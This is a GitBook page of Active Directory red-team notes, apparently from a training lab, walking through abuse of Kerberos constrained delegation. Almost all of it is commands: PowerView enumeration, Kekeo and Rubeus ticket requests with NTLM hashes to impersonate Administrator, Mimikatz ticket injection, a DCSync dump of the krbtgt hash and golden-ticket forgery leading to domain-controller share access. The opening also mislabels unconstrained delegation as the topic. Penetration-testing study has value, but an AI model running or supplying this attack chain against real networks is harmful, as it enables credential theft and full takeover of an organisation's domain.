🖌️
AD-RED-TEAM
  • Active Directory Red Team
  • PowerShell Basics
    • Tips And Tricks
  • I. Active Directory Enumeration
    • User Hunting Domain Enumeration
    • Forest and Domains
    • User Enumeration
    • Groups Enumeration
    • Computers/Server Enumeration
    • Shares Enumeration
    • GP And OU Enumeration
    • ACL Domain Enumeration
    • Trust Domain Enumeration
  • II. Local Privilege Escalation
    • Lateral Movement
    • PowerUp Exploits
  • III. Domain Privilege Escalation
    • Forest Persistence – DCShadow
    • Trust Abuse - MSSQL Servers
    • Priv Esc – Across Forest using krbtgt Ticket
    • Priv Esc - Across Trusts using Trust Tickets
    • Priv Esc – DNSAdmins
    • Priv Esc - Constrained Delegation
    • Priv Esc – Unconstrained Delegation
    • Priv Esc - Targeted Kerberoasting - Set SPN
    • Targeted Kerberoasting - AS-REPs
    • Priv Esc - Kerberoast
  • IV. Domain Persistence and Dominance
    • Persistence ACLs - Security Descriptors
    • Persistence ACLs- Rights Abuse
    • Persistence ACL - AdminSDHolder
    • Persistence – Custom SSP
    • Persistence - DSRM
    • Persistence - Skeleton Key
    • Persistence - Silver Ticket
    • Persistence - Golden Ticket
  • V. Cross Trust Attacks
  • VI. Forest Persistence and Dominance
  • VII. Defenses – Monitoring
  • VIII. Defenses and bypass – Architecture and Work Culture Changes
  • IX. Defenses and Bypass – Deception
  • X. Defenses and Bypass – PowerShell
  • New Server
    • Move Lat-AppLocker
    • Move Lat-Invoke-Command
Powered by GitBook
On this page
  • Constrained Delegation For Users
  • Constrained Delegation - Server

Was this helpful?

  1. III. Domain Privilege Escalation

Priv Esc - Constrained Delegation

General/Basic or Unconstrained Delegation which allows the first hop server (web server in our example) to request access to any service on any computer in the domain.

Constrained Delegation For Users

#General/Basic or Unconstrained Delegation which allows the first hop server
#web server in our example) to request access to any service on any computer in
#the domain.

import-module .\PowerView_dev.ps1
#The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION – T2A4D UserAccountControl attribute

#Enumerate users and computers with constrained delegation enabled
Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth

#Enumerate users and computers with constrained delegation enabled
Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth

#open powershell as normal user
cd .\kekeo
cd .\x64

#Get the TGT for websvc
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f


#Request the TGT for websvc
we are impersonating websvc with TGT_websvc to only the cifs/dcorp-mssql
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL


exit
import-module invoke-mimikatz

#Invoke-mimikatz to where the ticket was saved:
#Using mimikatz, inject the ticket:
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
klist


as you can see, we now have a ticket with Administrator to dcorp-mssql
#Confirm access. We only have access to the file system. We do not have access to the Enter-PSSession
ls \\dcorp-mssql\c$


#To abuse Constrained delegation using Rubeus, 
#we can use the following command (We are requesting a TGT and TGS' 
#in a single command):

.\Rubeus.exe s4u /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
#Confirm access. We only have access to the file system. We do not have access to the Enter-PSSession
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Constrained Delegation - Server

#General/Basic or Unconstrained Delegation which allows the first hop server
#web server in our example) to request access to any service on any computer in
#the domain.

import-module .\PowerView_dev.ps1
#The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION – T2A4D UserAccountControl attribute

#Enumerate users and computers with constrained delegation enabled
Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth

----------------------- Let's Abuse it with Server Hash----------------------- 
Get-DomainComputer –TrustedToAuth


#Either plaintext password or NTLM hash is required. If we have access to dcorp-adminsrv hash
#Using asktgt from Kekeo, we request a TGT:
kekeo.exe
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:5e77978a734e3a7f3895fb0fdbda3b96


Using s4u from Kekeo_one (no SNAME validation): we resquest  ticket for time and for the LDAP service
tgs::s4u /tgt:TGT_dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL

#Exit kekeo
exit

#invoke mimikatz from kekeo directory
. ..\..\invoke-mimikatz.ps1

#Using mimikatz
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'

#We can request any secret by IMPERSONATING the domain administrator and without compromising the domain administrator
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'






#Perform Golden Ticket attack with krbtgt hash show above
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:513 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
 


klist
ls \\dcorp-dc\c$
cd \\dcorp-dc\c$
PreviousPriv Esc – DNSAdminsNextPriv Esc – Unconstrained Delegation

Last updated 4 years ago

Was this helpful?